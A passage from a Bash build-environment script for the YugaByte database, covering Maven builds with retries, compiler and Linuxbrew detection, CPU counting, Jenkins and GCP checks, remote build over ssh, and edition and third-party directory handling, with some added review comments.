  export YB_MVN_SETTINGS_PATH
  mvn_common_options=(
    --batch-mode
    -Dmaven.repo.local="$YB_MVN_LOCAL_REPO"
    -Dyb.thirdparty.dir="$YB_THIRDPARTY_DIR"
    -DbinDir="$BUILD_ROOT/bin"
  )
}
# A utility function called by both 'build_yb_java_code' and 'build_yb_java_code_with_retries'.
build_yb_java_code_filter_save_output() {
  # Run 'mvn' with the standard options, filtering noisy output lines
  # (MVN_OUTPUT_FILTER_REGEX) and tee-ing the result to a file. Returns 0 iff
  # the output contains "BUILD SUCCESS" (mvn itself runs with --fail-never at
  # call sites, so its exit code is not trustworthy).
  set_mvn_parameters
  # --batch-mode hides download progress.
  # We are filtering out some patterns from Maven output, e.g.:
  # [INFO] META-INF/NOTICE already added, skipping
  # [INFO] Downloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.4/plexus-classworlds-2.4.jar (46 KB at 148.2 KB/sec)
  # [INFO] Downloading: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-logging-api/1.1.2/doxia-logging-api-1.1.2.jar
  local has_local_output=false # default is output path variable is set by calling function
  if [[ -z ${java_build_output_path:-} ]]; then
    # Dynamic scoping: callers may pre-set java_build_output_path so they can
    # inspect the output file after we return.
    local java_build_output_path=/tmp/yb-java-build-$( get_timestamp ).$$.tmp
    has_local_output=true
  fi
  local mvn_opts=( "${mvn_common_options[@]}" )
  if [[ -f $YB_MVN_SETTINGS_PATH ]]; then
    mvn_opts+=(
      --settings "$YB_MVN_SETTINGS_PATH"
    )
  elif [[ $YB_MVN_SETTINGS_PATH != $HOME/.m2/settings.xml ]]; then
    log "Maven user settings file specified by YB_MVN_SETTINGS_PATH does not exist:" \
        "'$YB_MVN_SETTINGS_PATH'"
  fi
  if ! is_jenkins; then
    mvn_opts+=( -Dmaven.javadoc.skip )
  fi
  set +e -x  # +e: do not fail on grep failure, -x: print the command to stderr.
  if mvn "${mvn_opts[@]}" "$@" 2>&1 | \
      egrep -v --line-buffered "$MVN_OUTPUT_FILTER_REGEX" | \
      tee "$java_build_output_path"; then
    set +x  # stop printing commands
    # We are testing for mvn build failure with grep, since we run mvn with '--fail-never' which
    # always returns success. '--fail-at-end' could have been another possibility, but that mode
    # skips dependent modules so most tests are often not run. Therefore, we resort to grep.
    egrep "BUILD SUCCESS" "$java_build_output_path" &>/dev/null
    local mvn_exit_code=$?
    set -e
    if [[ $has_local_output == "true" ]]; then
      rm -f "$java_build_output_path"  # cleaning up
    fi
    log "Java build finished with exit code $mvn_exit_code"  # useful for searching in console output
    return $mvn_exit_code
  fi
  set -e +x
  log "Java build or one of its output filters failed"
  if [[ -f $java_build_output_path ]]; then
    log "Java build output (from '$java_build_output_path'):"
    cat "$java_build_output_path"
    log "(End of Java build output)"
    rm -f "$java_build_output_path"
  else
    log "Java build output path file not found at '$java_build_output_path'"
  fi
  return 1
}
build_yb_java_code() {
  # Run the Java build once. The local variable below is picked up by
  # build_yb_java_code_filter_save_output via bash dynamic scoping.
  local java_build_output_path=/tmp/yb-java-build-$( get_timestamp ).$$.tmp
  build_yb_java_code_filter_save_output "$@"
  # NOTE(review): under 'set -e' a non-zero return from the call above would
  # terminate the script before reaching this line unless this function is
  # itself invoked in a conditional context — confirm call sites.
  local mvn_exit_code=$?
  rm -f "$java_build_output_path"
  return $mvn_exit_code
}
build_yb_java_code_with_retries() {
  # Run the Java build up to MAX_JAVA_BUILD_ATTEMPTS times, retrying only when
  # the failure looks like a transient artifact-download (connectivity) issue.
  # Returns 0 on the first successful attempt, 1 otherwise. The temp file is
  # shared with build_yb_java_code_filter_save_output via dynamic scoping.
  local java_build_output_path=/tmp/yb-java-build-$( get_timestamp ).$$.tmp
  declare -i attempt=1
  while [[ $attempt -le $MAX_JAVA_BUILD_ATTEMPTS ]]; do
    if build_yb_java_code_filter_save_output "$@"; then
      rm -f "$java_build_output_path"
      return 0
    fi
    if grep "Could not transfer artifact" "$java_build_output_path" >/dev/null; then
      log "Java build attempt $attempt failed due to temporary connectivity issues, re-trying."
    else
      # Permanent failure: clean up the temp file (the original code leaked
      # it on this path).
      rm -f "$java_build_output_path"
      return 1
    fi
    rm -f "$java_build_output_path"
    let attempt+=1
  done
  # All attempts exhausted (the temp file was already removed in the loop;
  # -f makes this a no-op in that case).
  rm -f "$java_build_output_path"
  return 1
}
# Create a directory on an ephemeral drive and link it into the given target location. If there are
# no ephemeral drives, create the directory in place.
# Parameters:
#   target_path - The target path to create the directory or symlink at.
#   directory_identifier - A unique identifier that will be used in naming the new directory
#                          created on an ephemeral drive.
create_dir_on_ephemeral_drive() {
  expect_num_args 2 "$@"
  local target_path=$1
  local directory_identifier=$2
  if [[ -z ${num_ephemeral_drives:-} ]]; then
    # Collect available ephemeral drives. This is only done once.
    local ephemeral_mountpoint
    # EPHEMERAL_DRIVES_FILTER_REGEX is not supposed to be anchored in the end, so we need to add
    # a "$" to filter ephemeral mountpoints correctly.
    ephemeral_drives=()
    for ephemeral_mountpoint in $EPHEMERAL_DRIVES_GLOB; do
      if [[ -d $ephemeral_mountpoint &&
            $ephemeral_mountpoint =~ $EPHEMERAL_DRIVES_FILTER_REGEX$ ]]; then
        ephemeral_drives+=( "$ephemeral_mountpoint" )
      fi
    done
    declare -r -i num_ephemeral_drives=${#ephemeral_drives[@]}  # "-r -i" means readonly integer.
  fi
  if [[ $num_ephemeral_drives -eq 0 ]]; then
    if [[ -n ${YB_VERBOSE:-} && ! -d $target_path ]]; then
      log "No ephemeral drives found, creating directory '$target_path' in place."
    fi
    mkdir_safe "$target_path"
  else
    # Spread directories across drives by picking one at random.
    local random_drive=${ephemeral_drives[$RANDOM % $num_ephemeral_drives]}
    # NOTE(review): $jenkins_job_and_build is not defined anywhere in this
    # file — presumably set by the calling script; under 'set -u' this fails
    # if unset. Confirm callers define it.
    local actual_dir=$random_drive/${USER}__$jenkins_job_and_build/$directory_identifier
    mkdir_safe "$actual_dir"
    # Create the parent directory that we'll be creating a link in, if necessary.
    if [[ ! -d ${target_path%/*} ]]; then
      log "Directory $target_path does not exist, creating it before creating a symlink inside."
      mkdir_safe "${target_path%/*}"
    fi
    ln -s "$actual_dir" "$target_path"
    log "Created '$target_path' as a symlink to an ephemeral drive location '$actual_dir'."
  fi
}
mkdir_safe() {
  # mkdir -p that first removes a broken symlink sitting at the target path
  # (mkdir -p would otherwise fail on it).
  expect_num_args 1 "$@"
  local dir_path=$1
  # Check if this is a broken link.
  if [[ -h $dir_path && ! -d $dir_path ]]; then
    unlink "$dir_path"
  fi
  mkdir -p "$dir_path"
}
# Skip the most part of the normal C++ build output. Still keep the "100%" lines so we can see
# if the build runs to completion. This only filters stdin, so it is expected that stderr is
# redirected to stdout when invoking the C++ build.
filter_boring_cpp_build_output() {
  # Single inverted egrep; the alternation must stay byte-exact, including the
  # backslash-newline continuations (no leading whitespace on continuations,
  # or it would leak into the pattern).
  egrep -v --line-buffered "\
^(\[ *[0-9]{1,2}%\] +)*(\
Building C(XX)? object |\
Running C[+][+] protocol buffer compiler (with YRPC plugin )?on |\
Linking CXX ((static|shared )?library|executable) |\
Built target \
)|\
Scanning dependencies of target |\
^ssh: connect to host .* port [0-9]+: Connection (timed out|refused)|\
Host .* seems to be down, retrying on a different host|\
Connection to .* closed by remote host.|\
ssh: Could not resolve hostname build-workers-.*: Name or service not known"
}
remove_path_entry() {
  # Remove every occurrence of directory $1 from PATH and re-export it.
  expect_num_args 1 "$@"
  local path_entry=$1
  local prev_path=""
  # Remove all occurrences of the given entry. Wrapping PATH in ':' lets the
  # ":entry:" pattern match at the first/last position too; loop until a pass
  # changes nothing, which handles adjacent duplicate entries.
  while [[ $PATH != $prev_path ]]; do
    prev_path=$PATH
    PATH=:$PATH:
    PATH=${PATH//:$path_entry:/:}
    PATH=${PATH#:}
    PATH=${PATH%:}
  done
  export PATH
}
# Removes the ccache wrapper directory from PATH so we can find the real path to a compiler, e.g.
# /usr/bin/gcc instead of /usr/lib64/ccache/gcc. This is expected to run in a subshell so that we
# don't make any unexpected changes to the script's PATH.
# TODO: how to do this properly on Mac OS X?
remove_ccache_dir_from_path() {
  # See the comment above: drops the ccache wrapper directory so "which gcc" etc.
  # resolve to the real compiler. Mutates PATH — run in a subshell to keep the
  # change local (Linux-specific path; Mac handling is still a TODO above).
  remove_path_entry /usr/lib64/ccache
}
# Given a compiler type, e.g. gcc or clang, find the actual compiler executable (not a wrapper
# provided by ccache). Takes into account YB_GCC_PREFIX and YB_CLANG_PREFIX variables that allow to
# use custom gcc and clang installations. Sets cc_executable and cxx_executable variables. This is
# used in compiler-wrapper.sh.
# See the comment above: resolves the concrete C and C++ compiler executables for a
# compiler type (gcc / clang / zapcc), honoring YB_GCC_PREFIX, YB_CLANG_PREFIX,
# YB_ZAPCC_INSTALL_PATH and Linuxbrew. Sets the cc_executable / cxx_executable
# globals; calls fatal on any inconsistency.
find_compiler_by_type() {
  # NOTE(review): this first assignment makes compiler_type a global before it is
  # re-declared local two lines down — presumably only the local is intended;
  # confirm whether any caller relies on the global being set.
  compiler_type=$1
  validate_compiler_type "$1"
  local compiler_type=$1
  # Start from a clean slate so stale values from a previous call cannot leak.
  unset cc_executable
  unset cxx_executable
  case "$compiler_type" in
    gcc)
      if [[ -n ${YB_GCC_PREFIX:-} ]]; then
        if [[ ! -d $YB_GCC_PREFIX/bin ]]; then
          fatal "Directory YB_GCC_PREFIX/bin ($YB_GCC_PREFIX/bin) does not exist"
        fi
        cc_executable=$YB_GCC_PREFIX/bin/gcc
        cxx_executable=$YB_GCC_PREFIX/bin/g++
      elif using_linuxbrew; then
        cc_executable=$YB_LINUXBREW_DIR/bin/gcc
        cxx_executable=$YB_LINUXBREW_DIR/bin/g++
      else
        # Plain command names; resolved to absolute paths via "which" below.
        cc_executable=gcc
        cxx_executable=g++
      fi
    ;;
    clang)
      if [[ -n ${YB_CLANG_PREFIX:-} ]]; then
        if [[ ! -d $YB_CLANG_PREFIX/bin ]]; then
          fatal "Directory YB_CLANG_PREFIX/bin ($YB_CLANG_PREFIX/bin) does not exist"
        fi
        cc_executable=$YB_CLANG_PREFIX/bin/clang
      elif [[ $OSTYPE =~ ^darwin ]]; then
        cc_executable=/usr/bin/clang
      else
        local clang_path
        local clang_found=false
        local clang_paths_to_try=(
          "$YB_THIRDPARTY_DIR/clang-toolchain/bin/clang"
          # clang is present in this location in pre-built third-party archives built before
          # the transition to Linuxbrew (https://phabricator.dev.yugabyte.com/D982). This can be
          # removed when the transition is complete.
          "$YB_THIRDPARTY_DIR/installed/common/bin/clang"
        )
        for clang_path in "${clang_paths_to_try[@]}"; do
          if [[ -f $clang_path ]]; then
            cc_executable=$clang_path
            clang_found=true
            break
          fi
        done
        if ! "$clang_found"; then
          fatal "Failed to find clang at the following locations: ${clang_paths_to_try[@]}"
        fi
      fi
      # cxx_executable may already be set by the YB_CLANG_PREFIX branch? It is not —
      # all clang branches above only set cc_executable, so this always derives it.
      if [[ -z ${cxx_executable:-} ]]; then
        cxx_executable=$cc_executable++ # clang -> clang++
      fi
    ;;
    zapcc)
      if [[ -n ${YB_ZAPCC_INSTALL_PATH:-} ]]; then
        cc_executable=$YB_ZAPCC_INSTALL_PATH/bin/zapcc
        cxx_executable=$YB_ZAPCC_INSTALL_PATH/bin/zapcc++
      else
        cc_executable=zapcc
        cxx_executable=zapcc++
      fi
    ;;
    *)
      fatal "Unknown compiler type '$compiler_type'"
  esac
  # Post-process both variables: resolve bare command names to absolute paths
  # (bypassing any ccache wrapper directory) and verify the result is executable.
  local compiler_var_name
  for compiler_var_name in cc_executable cxx_executable; do
    if [[ -n ${!compiler_var_name:-} ]]; then
      local compiler_path=${!compiler_var_name}
      if [[ ! -x $compiler_path && $compiler_path =~ ^[a-z+]+$ ]]; then
        # This is a plain "gcc/g++/clang/clang++" compiler command name. Try to find the exact
        # compiler path using the "which" command.
        set +e
        compiler_path=$( remove_ccache_dir_from_path && which "${!compiler_var_name}" )
        if [[ $? -ne 0 ]]; then
          # "which" did not work, revert to the old value.
          compiler_path=${!compiler_var_name}
        fi
        set -e
      fi
      if [[ ! -x $compiler_path ]]; then
        fatal "Compiler executable does not exist at the path we set $compiler_var_name to" \
              "(possibly applying 'which' expansion): $compiler_path" \
              "(trying to use compiler type '$compiler_type')."
      fi
      eval $compiler_var_name=\"$compiler_path\"
    fi
  done
}
# Make pushd and popd quiet.
# http://stackoverflow.com/questions/25288194/dont-display-pushd-popd-stack-accross-several-bash-scripts-quiet-pushd-popd
# Quiet replacement for the pushd builtin (see link above) that also validates the
# target directory before changing into it.
pushd() {
  [[ -d $1 ]] || fatal "Directory '$1' does not exist"
  command pushd "$@" > /dev/null
}
popd() {
  # Quiet replacement for the popd builtin; "command" bypasses this function itself.
  command popd "$@" > /dev/null
}
# Locate a usable Linuxbrew installation (Linux only). On success exports
# YB_LINUXBREW_DIR, sets YB_LINUXBREW_LIB_DIR and YB_USING_LINUXBREW=true; otherwise
# leaves YB_USING_LINUXBREW=false with the YB_LINUXBREW_* variables unset.
detect_linuxbrew() {
  YB_USING_LINUXBREW=false
  # Remember any user-specified directory, then unset so a failed detection does not
  # leave a half-configured environment.
  local user_specified_linuxbrew_dir=${YB_LINUXBREW_DIR:-}
  unset YB_LINUXBREW_DIR
  unset YB_LINUXBREW_LIB_DIR
  if ! is_linux; then
    return
  fi
  local candidates=(
    "$HOME/.linuxbrew-yb-build"
  )
  # A checked-in file may pin the Linuxbrew version Jenkins builds should use.
  local version_for_jenkins_file=$YB_SRC_ROOT/thirdparty/linuxbrew_version_for_jenkins.txt
  if [[ -f $version_for_jenkins_file ]]; then
    local version_for_jenkins=$( read_file_and_trim "$version_for_jenkins_file" )
    preferred_linuxbrew_dir="$SHARED_LINUXBREW_BUILDS_DIR/linuxbrew_$version_for_jenkins"
    if [[ -d $preferred_linuxbrew_dir ]]; then
      if is_jenkins_user; then
        # If we're running on Jenkins (or building something for consumption by Jenkins under the
        # "jenkins" user), then the "Linuxbrew for Jenkins" directory takes precedence.
        candidates=( "$preferred_linuxbrew_dir" "${candidates[@]}" )
      else
        # Otherwise, the user's local Linuxbrew build takes precedence.
        candidates=( "${candidates[@]}" "$preferred_linuxbrew_dir" )
      fi
    elif is_jenkins; then
      log "Warning: Linuxbrew directory referenced by '$version_for_jenkins_file' does not" \
          "exist: '$preferred_linuxbrew_dir', will attempt to use other location."
    fi
  elif is_jenkins; then
    log "Warning: '$version_for_jenkins_file' does not exist"
  fi
  # An explicitly user-specified directory outranks everything else.
  if [[ -n $user_specified_linuxbrew_dir ]]; then
    candidates=( "$user_specified_linuxbrew_dir" "${candidates[@]}" )
  fi
  # Accept the first candidate that looks like a complete installation (bin/lib/include).
  local linuxbrew_dir
  for linuxbrew_dir in "${candidates[@]}"; do
    if [[ -d "$linuxbrew_dir" &&
          -d "$linuxbrew_dir/bin" &&
          -d "$linuxbrew_dir/lib" &&
          -d "$linuxbrew_dir/include" ]]; then
      export YB_LINUXBREW_DIR=$linuxbrew_dir
      YB_USING_LINUXBREW=true
      YB_LINUXBREW_LIB_DIR=$YB_LINUXBREW_DIR/lib
      break
    fi
  done
}
# Predicate: did detect_linuxbrew decide we are building with Linuxbrew?
# The exit status of [[ ]] is the function's return value, so no explicit
# return 0 / return 1 branches are needed.
using_linuxbrew() {
  [[ $YB_USING_LINUXBREW == true ]]
}
# Predicate: is the Ninja build system enabled via YB_USE_NINJA=1?
using_ninja() {
  [[ ${YB_USE_NINJA:-} == "1" ]]
}
# Prepend the Linuxbrew bin directory to PATH (when using Linuxbrew) so the right
# compiler and linker are found; a no-op otherwise.
set_build_env_vars() {
  if ! using_linuxbrew; then
    return
  fi
  export PATH=$YB_LINUXBREW_DIR/bin:$PATH
}
# Populate YB_NUM_CPUS with the host CPU count unless it already holds a valid number.
detect_num_cpus() {
  # Only detect when the variable is unset or not a plain integer.
  if [[ ! ${YB_NUM_CPUS:-} =~ ^[0-9]+$ ]]; then
    if is_linux; then
      # One "processor" stanza per logical CPU on Linux.
      YB_NUM_CPUS=$(grep -c processor /proc/cpuinfo)
    elif is_mac; then
      YB_NUM_CPUS=$(sysctl -n hw.ncpu)
    else
      fatal "Don't know how to detect the number of CPUs on OS $OSTYPE."
    fi
    # Sanity-check the detected value.
    if [[ ! $YB_NUM_CPUS =~ ^[0-9]+$ ]]; then
      fatal "Invalid number of CPUs detected: '$YB_NUM_CPUS' (expected a number)."
    fi
  fi
}
# Compute and export YB_MAKE_PARALLELISM. For local builds this is simply the CPU
# count; for remote/distributed builds it is derived from the number of build
# workers times the cores per worker.
detect_num_cpus_and_set_make_parallelism() {
  detect_num_cpus
  if [[ -z ${YB_MAKE_PARALLELISM:-} ]]; then
    if [[ ${YB_REMOTE_BUILD:-} == "1" ]]; then
      # One worker host per line in YB_BUILD_WORKERS_FILE.
      declare -i num_build_workers=$( wc -l "$YB_BUILD_WORKERS_FILE" | awk '{print $1}' )
      # Add one to the number of workers so that we cause the auto-scaling group to scale up a bit
      # by stressing the CPU on each worker a bit more.
      declare -i effective_num_build_workers=$(( $num_build_workers + 1 ))
      # However, make sure this number is within a reasonable range.
      if [[ $effective_num_build_workers -lt $MIN_EFFECTIVE_NUM_BUILD_WORKERS ]]; then
        effective_num_build_workers=$MIN_EFFECTIVE_NUM_BUILD_WORKERS
      fi
      if [[ $effective_num_build_workers -gt $MAX_EFFECTIVE_NUM_BUILD_WORKERS ]]; then
        effective_num_build_workers=$MAX_EFFECTIVE_NUM_BUILD_WORKERS
      fi
      YB_MAKE_PARALLELISM=$(( $effective_num_build_workers * $YB_NUM_CORES_PER_BUILD_WORKER ))
    else
      YB_MAKE_PARALLELISM=$YB_NUM_CPUS
    fi
  fi
  export YB_MAKE_PARALLELISM
}
run_sha256sum_on_mac() {
  # macOS has no sha256sum binary; shasum in portable SHA-256 mode is the equivalent.
  shasum --portable --algorithm 256 "$@"
}
# Verify files against a checksum list (sha256sum --check semantics), dispatching to
# the macOS-compatible implementation when on Darwin.
verify_sha256sum() {
  local common_args="--check"
  if [[ $OSTYPE =~ darwin ]]; then
    run_sha256sum_on_mac $common_args "$@"
  else
    # --quiet suppresses per-file "OK" lines on Linux.
    sha256sum --quiet $common_args "$@"
  fi
}
# Print only the SHA-256 digest (first column) for the given file(s), handling the
# macOS/Linux tool difference.
compute_sha256sum() {
  (
    if [[ $OSTYPE =~ darwin ]]; then
      run_sha256sum_on_mac "$@"
    else
      sha256sum "$@"
    fi
  ) | awk '{print $1}'
}
# Sanity-check that YB_THIRDPARTY_DIR points at a real third-party tree by probing
# for a few expected entries; fatal (via the ensure_* helpers) otherwise.
validate_thirdparty_dir() {
  ensure_directory_exists "$YB_THIRDPARTY_DIR/build_definitions"
  ensure_directory_exists "$YB_THIRDPARTY_DIR/patches"
  ensure_file_exists "$YB_THIRDPARTY_DIR/build_thirdparty.py"
}
# Detect if we're running on Google Compute Platform. We perform this check lazily as there might be
# a bit of a delay resolving the domain name.
detect_gcp() {
  # How to detect if we're running on Google Compute Engine:
  # https://cloud.google.com/compute/docs/instances/managing-instances#dmi
  # YB_PRETEND_WE_ARE_ON_GCP forces a positive answer (useful for testing); otherwise
  # probe the GCE metadata server with a 1-second connection timeout. The result is
  # cached in a readonly variable so the probe runs at most once per process.
  if [[ -n ${YB_PRETEND_WE_ARE_ON_GCP:-} ]] || \
     curl metadata.google.internal --silent --output /dev/null --connect-timeout 1; then
    readonly is_running_on_gcp_exit_code=0  # "true" exit code
  else
    readonly is_running_on_gcp_exit_code=1  # "false" exit code
  fi
}
# Lazily-cached predicate: are we on Google Compute Engine? The (potentially slow)
# detection runs only on the first call; later calls reuse the cached exit code.
is_running_on_gcp() {
  [[ -n ${is_running_on_gcp_exit_code:-} ]] || detect_gcp
  return "$is_running_on_gcp_exit_code"
}
is_jenkins_user() {
  # Predicate: running as the "jenkins" OS user (exit status of [[ ]] is the result).
  [[ $USER == "jenkins" ]]
}
# Predicate: are we running inside a Jenkins job? Jenkins sets BUILD_ID and JOB_NAME;
# we additionally require the jenkins OS user to avoid false positives locally.
is_jenkins() {
  [[ -n ${BUILD_ID:-} && -n ${JOB_NAME:-} ]] && is_jenkins_user
}
# Check if we're in a Jenkins master build.
# Predicate: is this a Jenkins job for the master branch ("-master-" in JOB_NAME)?
is_jenkins_master_build() {
  [[ -n ${JOB_NAME:-} && $JOB_NAME = *-master-* ]]
}
# Check if we're in a Jenkins Phabricator build (a pre-commit build).
# Predicate: is this a Jenkins Phabricator (pre-commit) job? Recognized by
# "-phabricator" appearing inside, or at the end of, the job name.
is_jenkins_phabricator_build() {
  if [[ -z ${JOB_NAME:-} ]]; then
    return 1  # Not on Jenkins at all.
  fi
  [[ $JOB_NAME == *-phabricator-* || $JOB_NAME == *-phabricator ]]
}
# Check if we're using an NFS partition in YugaByte's build environment.
# Predicate: does YB_SRC_ROOT live under one of the NFS mount prefixes (/n, /z, /u)
# used in YugaByte's build environment?
is_src_root_on_nfs() {
  [[ $YB_SRC_ROOT =~ ^/(n|z|u)/ ]]
}
# Predicate: is the remote/distributed build mode enabled (YB_REMOTE_BUILD=1)?
is_remote_build() {
  [[ ${YB_REMOTE_BUILD:-} == "1" ]]
}
# This is used for escaping command lines for remote execution.
# From StackOverflow: https://goo.gl/sTKReB
# Using this approach: "Put the whole string in single quotes. This works for all chars except
# single quote itself. To escape the single quote, close the quoting before it, insert the single
# quote, and re-open the quoting."
#
# Escape a command line for remote execution; result goes in escape_cmd_line_rv.
# Each argument is wrapped in single quotes, and every embedded single quote is
# replaced with '\'' (close the quoting, escaped quote, reopen the quoting) — the
# technique described in the comment above this function.
escape_cmd_line() {
  escape_cmd_line_rv=""
  for arg in "$@"; do
    # Bug fix: use ${arg//...} (replace ALL occurrences). The previous single-slash
    # form ${arg/...} only escaped the FIRST single quote, corrupting any argument
    # containing more than one — contradicting the sed "/g" equivalence noted below.
    escape_cmd_line_rv+=" '"${arg//\'/\'\\\'\'}"'"
    # This should be equivalent to the sed command below. The quadruple backslash encodes one
    # backslash in the replacement string. We don't need that in the pure-bash implementation above.
    # sed -e "s/'/'\\\\''/g; 1s/^/'/; \$s/\$/'/"
  done
  # Remove the leading space if necessary.
  escape_cmd_line_rv=${escape_cmd_line_rv# }
}
# Run an executable on a remote build host via ssh, preserving the current working
# directory and PATH. Remaining arguments are escaped with escape_cmd_line so they
# survive the extra level of shell interpretation on the remote side.
run_remote_cmd() {
  local build_host=$1
  local executable=$2
  shift 2
  # Declared local so escape_cmd_line's "return value" does not leak to the caller.
  local escape_cmd_line_rv
  escape_cmd_line "$@"
  ssh "$build_host" \
      "'$YB_BUILD_SUPPORT_DIR/remote_cmd.sh' '$PWD' '$PATH' '$executable' $escape_cmd_line_rv"
}
# Run the build command (cmake / make) on the appropriate host. This is localhost in most cases.
# However, in a remote build, we ensure we run this command on the "distributed build master host"
# machine, as there are some issues with running cmake or make over NFS (e.g. stale file handles).
run_build_cmd() {
  # See the comment above: in a distributed build, cmake/make must run on the build
  # master host (NFS issues otherwise); locally (or when we already ARE the master)
  # just run the command in place.
  if is_remote_build && [[ $HOSTNAME != $DISTRIBUTED_BUILD_MASTER_HOST ]]; then
    run_remote_cmd "$DISTRIBUTED_BUILD_MASTER_HOST" "$@"
  else
    "$@"
  fi
}
# Decide whether to enable the distributed build. Exports YB_REMOTE_BUILD=1 when we
# are in an NFS GCP environment and nothing forbids it; otherwise (on Jenkins) logs
# diagnostics explaining why remote build is off.
configure_remote_build() {
  # Automatically set YB_REMOTE_BUILD in an NFS GCP environment.
  if [[ -z ${YB_NO_REMOTE_BUILD:-} ]] && is_running_on_gcp && is_src_root_on_nfs; then
    if [[ -z ${YB_REMOTE_BUILD:-} ]]; then
      log "Automatically enabling distributed build (running in an NFS GCP environment). " \
          "Use YB_NO_REMOTE_BUILD (or the --no-remote ybd option) to disable this behavior."
      export YB_REMOTE_BUILD=1
    else
      log "YB_REMOTE_BUILD already defined: '$YB_REMOTE_BUILD', not enabling it automatically," \
          "even though we would in this case."
    fi
  elif is_jenkins; then
    # Make it easier to diagnose why we're not using the distributed build. Only enable this on
    # Jenkins to avoid confusing output during development.
    log "Not using remote / distributed build:" \
        "YB_NO_REMOTE_BUILD=${YB_NO_REMOTE_BUILD:-undefined}. See additional diagnostics below."
    # Explicit if/else instead of the previous "A && log ... || log ..." chain: that
    # form would also run the second log if the first log itself failed, not only
    # when A is false.
    if is_running_on_gcp; then
      log "Running on GCP."
    else
      log "This is not GCP."
    fi
    if is_src_root_on_nfs; then
      log "YB_SRC_ROOT ($YB_SRC_ROOT) appears to be on NFS in YugaByte's distributed build setup."
    fi
  fi
}
# Tracks whether detect_edition has already run, making it idempotent.
yb_edition_detected=false
# Abort unless YB_EDITION holds one of the two supported values.
validate_edition() {
  if [[ ! $YB_EDITION =~ ^(community|enterprise)$ ]]; then
    fatal "The YB_EDITION environment variable has an invalid value: '$YB_EDITION'" \
          "(must be either 'community' or 'enterprise')."
  fi
}
# Determine YB_EDITION (community/enterprise) once per process, then freeze and
# export it. Sources of truth, in order: an already-set YB_EDITION, the Jenkins job
# name, and finally the presence of the enterprise source directory.
detect_edition() {
  if "$yb_edition_detected"; then
    return
  fi
  yb_edition_detected=true
  # If we haven't detected edition based on BUILD_ROOT, let's do that based on existence of the
  # enterprise source directory.
  if [[ -z ${YB_EDITION:-} ]]; then
    if is_jenkins && [[ $JOB_NAME =~ -community(-|$) ]]; then
      YB_EDITION=community
      log "Detecting YB_EDITION: $YB_EDITION based on Jenkins job name: $JOB_NAME"
    elif is_jenkins && [[ $JOB_NAME =~ -enterprise(-|$) ]]; then
      YB_EDITION=enterprise
      log "Detecting YB_EDITION: $YB_EDITION based on Jenkins job name: $JOB_NAME"
    elif [[ -d $YB_ENTERPRISE_ROOT ]]; then
      YB_EDITION=enterprise
      log "Detected YB_EDITION: $YB_EDITION based on existence of '$YB_ENTERPRISE_ROOT'"
    else
      YB_EDITION=community
      log "Detected YB_EDITION: $YB_EDITION"
    fi
  fi
  # An enterprise build without the enterprise sources cannot proceed.
  if [[ $YB_EDITION == "enterprise" && ! -d $YB_ENTERPRISE_ROOT ]]; then
    fatal "YB_EDITION is set to '$YB_EDITION' but the directory '$YB_ENTERPRISE_ROOT'" \
          "does not exist"
  fi
  readonly YB_EDITION
  export YB_EDITION
}
# Set YB_SRC_ROOT to the given directory and derive the related path globals
# (build-support dir, enterprise root, compiler wrapper paths).
set_yb_src_root() {
  export YB_SRC_ROOT=$1
  YB_BUILD_SUPPORT_DIR=$YB_SRC_ROOT/build-support
  if [[ ! -d $YB_SRC_ROOT ]]; then
    fatal "YB_SRC_ROOT directory '$YB_SRC_ROOT' does not exist"
  fi
  YB_ENTERPRISE_ROOT=$YB_SRC_ROOT/ent
  YB_COMPILER_WRAPPER_CC=$YB_BUILD_SUPPORT_DIR/compiler-wrappers/cc
  YB_COMPILER_WRAPPER_CXX=$YB_BUILD_SUPPORT_DIR/compiler-wrappers/c++
}
# Print the given file with leading/trailing whitespace stripped from every line.
# Returns 1 (after logging) when the file does not exist.
read_file_and_trim() {
  expect_num_args 1 "$@"
  local file_name=$1
  if [[ ! -f $file_name ]]; then
    log "File '$file_name' does not exist"
    return 1
  fi
  # Read the file with sed directly instead of the previous "cat | sed" pipeline
  # (useless use of cat); behavior is otherwise unchanged.
  sed -e 's/^[[:space:]]*//; s/[[:space:]]*$//' "$file_name"
}
# In our internal environment we build third-party dependencies in separate directories on NFS
# so that we can use them across many builds.
# See the comment above: look for a pre-built shared third-party tree on NFS matching
# the version pinned for this OS. On success exports YB_THIRDPARTY_DIR and
# NO_REBUILD_THIRDPARTY=1 and sets found_shared_thirdparty_dir=true; on failure
# leaves found_shared_thirdparty_dir=false so the caller builds third-party locally.
find_thirdparty_dir() {
  found_shared_thirdparty_dir=false
  local parent_dir_for_shared_thirdparty=$NFS_PARENT_DIR_FOR_SHARED_THIRDPARTY
  if [[ ! -d $parent_dir_for_shared_thirdparty ]]; then
    log "Parent directory for shared third-party directories" \
        "('$NFS_PARENT_DIR_FOR_SHARED_THIRDPARTY') does not exist, cannot use pre-built" \
        "third-party directory from there."
    return
  fi
  # Version pinned per OS ("short_os_name" is set by detect_os).
  local version=$(
    read_file_and_trim "$YB_SRC_ROOT/thirdparty/version_for_jenkins_${short_os_name}.txt"
  )
  local thirdparty_dir_suffix="yugabyte-thirdparty-${version}/thirdparty"
  local existing_thirdparty_dir="${parent_dir_for_shared_thirdparty}/${thirdparty_dir_suffix}"
  if [[ -d $existing_thirdparty_dir ]]; then
    log "Using existing third-party dependencies from $existing_thirdparty_dir"
    if is_jenkins; then
      # Reclaim disk: the in-tree third-party build is redundant once we use the
      # shared one. YB_THIRDPARTY_DIR is unset so the clean script targets the
      # in-tree location.
      log "Cleaning the old dedicated third-party dependency build in '$YB_SRC_ROOT/thirdparty'"
      unset YB_THIRDPARTY_DIR
      "$YB_SRC_ROOT/thirdparty/clean_thirdparty.sh" --all
    fi
    export YB_THIRDPARTY_DIR=$existing_thirdparty_dir
    found_shared_thirdparty_dir=true
    export NO_REBUILD_THIRDPARTY=1
    return
  fi
  log "Even though the top-level directory '$parent_dir_for_shared_thirdparty'" \
      "exists, we could not find a prebuilt shared third-party directory there that exists. " \
      "Falling back to building our own third-party dependencies."
}
# When true, suppress the informational log lines below (used when walking up from
# the current directory, where this may run repeatedly).
handle_predefined_build_root_quietly=false
# Parse a caller-provided build root directory name (build type, compiler type,
# linking type, edition, optional "-ninja" suffix) and reconcile each component with
# the corresponding environment variable / global, setting whichever side is unset
# and failing on any mismatch.
handle_predefined_build_root() {
  expect_num_args 0 "$@"
  if [[ -z ${predefined_build_root:-} ]]; then
    return
  fi
